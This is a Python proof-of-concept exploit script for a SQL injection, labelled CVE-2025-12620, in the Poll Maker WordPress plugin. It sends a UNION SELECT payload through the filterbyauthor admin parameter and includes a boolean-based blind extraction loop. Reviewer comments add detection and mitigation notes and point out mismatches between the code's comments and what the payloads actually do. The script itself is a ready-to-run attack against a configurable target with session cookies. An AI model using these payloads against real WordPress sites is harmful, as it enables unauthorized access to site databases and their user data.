# CVE-2025-12620 PoC - SQL Injection in Poll Maker WordPress Plugin
# Requires Administrator-level access
import requests
import sys
from urllib.parse import quote
# Placeholder target and session material; both must be replaced before the
# script does anything useful. The script is post-authentication only (see the
# header comment): wordpress_logged_in_user has to carry a valid Administrator
# session, which is also the reason the PoC requires admin-level access.
TARGET_URL = "http://target-wordpress-site.com"
COOKIES = dict(
    wordpress_test_cookie="WP+Cookie+check",
    wordpress_logged_in_user="your_admin_session_cookie",
)
def exploit_sql_injection():
    """
    SQL Injection via filterbyauthor parameter in Poll Maker <= 6.0.7
    This PoC demonstrates extracting the WordPress database prefix and user count

    As written, the function sends a single authenticated GET to
    wp-admin/admin.php with page=poll-maker-polls and the UNION string
    below in ``filterbyauthor``, then only prints the status code and the
    final request URL. It never parses the response body, so nothing is
    extracted programmatically; the operator is told to inspect the
    response by hand. The payload selects user() only (column 9) - the
    "prefix and user count" wording above is not implemented in this code.

    Returns:
        None. Outcome is reported via print().

    Raises:
        Nothing from the HTTP layer: requests.exceptions.RequestException
        is caught and printed.

    Defender notes:
        Detection - the observable signature is a request to
        /wp-admin/admin.php?page=poll-maker-polls whose filterbyauthor
        value contains a quote followed by UNION SELECT; presumably that
        parameter is meant to hold a numeric author id (confirm against
        the plugin source), so any non-numeric value in access logs or at
        the WAF is a strong indicator.
        Mitigation - on the plugin side, integer-cast filterbyauthor and
        bind it via $wpdb->prepare(); update beyond 6.0.7 (version per the
        header comment - confirm against the vendor advisory). Impact is
        bounded by the precondition: the caller must already hold an
        Administrator session (COOKIES), so this is a post-auth database
        read, not an unauthenticated entry point.
    """
    # Target endpoint: WordPress admin admin.php with poll-maker poll list
    endpoint = f"{TARGET_URL}/wp-admin/admin.php"
    # Malicious payload to extract database user() and version()
    # Original query is appended with our injection
    # NOTE(review): only user() appears in the string; version() is not
    # selected despite the comment above. The payload is left exactly as the
    # author wrote it.
    injection_payload = "1' UNION SELECT 1,2,3,4,5,6,7,8,user(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,101---"
    params = {
        "page": "poll-maker-polls",
        "filterbyauthor": injection_payload
    }
    try:
        # COOKIES (module level) must carry a valid admin session; requests
        # URL-encodes the payload itself, so the `quote` import is unused here.
        response = requests.get(endpoint, params=params, cookies=COOKIES, timeout=30)
        if response.status_code == 200:
            # 200 only means the admin page rendered; whether the injection
            # changed the page content is not checked programmatically.
            print(f"[+] Request sent successfully")
            print(f"[+] Check response for injected SQL results")
            print(f"[*] Target URL: {response.url}")
        else:
            print(f"[-] Request failed with status: {response.status_code}")
    except requests.exceptions.RequestException as e:
        # Transport-level failures (timeouts, connection errors) are reported
        # rather than propagated.
        print(f"[-] Error: {e}")
def blind_sql_injection():
    """
    Boolean-based blind SQL injection for data extraction

    Iterates character positions 1..19 and printable ASCII 32..126, sending
    one authenticated GET per (position, character) pair to the same
    admin.php?page=poll-maker-polls endpoint. A hit is declared only when
    the response is 200 and its body contains the literal string
    "expected_result"; nothing in this file defines what that marker is,
    so the oracle is a placeholder as written. On a hit the inner loop
    breaks and the outer loop moves to the next position. This function is
    never called: the __main__ block invokes exploit_sql_injection() only.

    Returns:
        None. Hits would be reported via print().

    Defender notes:
        Detection - up to 19 * 95 requests from one Administrator session
        against the same endpoint, differing only in the filterbyauthor
        value and each carrying AND ASCII(SUBSTRING(...)), is a loud access
        log pattern; per-session rate limits and a WAF rule on that
        parameter catch it early.
        Mitigation - same as exploit_sql_injection(): integer-cast and
        parameterize filterbyauthor in the plugin; update beyond 6.0.7.
    """
    # Example: Extract WordPress table prefix
    target = f"{TARGET_URL}/wp-admin/admin.php"
    for i in range(1, 20):
        for ascii_val in range(32, 127):
            char = chr(ascii_val)
            payload = f"1' AND ASCII(SUBSTRING((SELECT wpdb.table_name FROM wpdb LIMIT 1),{i},1))={ascii_val}---"
            params = {"page": "poll-maker-polls", "filterbyauthor": payload}
            try:
                resp = requests.get(target, params=params, cookies=COOKIES, timeout=10)
                # Based on response timing or content differences
                # NOTE(review): only content is checked below; no timing
                # measurement exists in this function despite the comment.
                if resp.status_code == 200 and "expected_result" in resp.text:
                    print(f"Found character {i}: {char}")
                    break
            except:
                # Bare except: swallows every exception, including
                # KeyboardInterrupt and SystemExit, so Ctrl-C cannot stop the
                # loop cleanly and transport errors are silently dropped. The
                # narrower requests.exceptions.RequestException used by
                # exploit_sql_injection() is the usual choice; left unchanged.
                pass
# Entry point: print the banner, then run the single-request UNION variant.
# blind_sql_injection() is intentionally not wired up here.
if __name__ == "__main__":
    banner = (
        "CVE-2025-12620 SQL Injection PoC",
        "Target: WordPress Poll Maker Plugin <= 6.0.7",
    )
    print("\n".join(banner))
    exploit_sql_injection()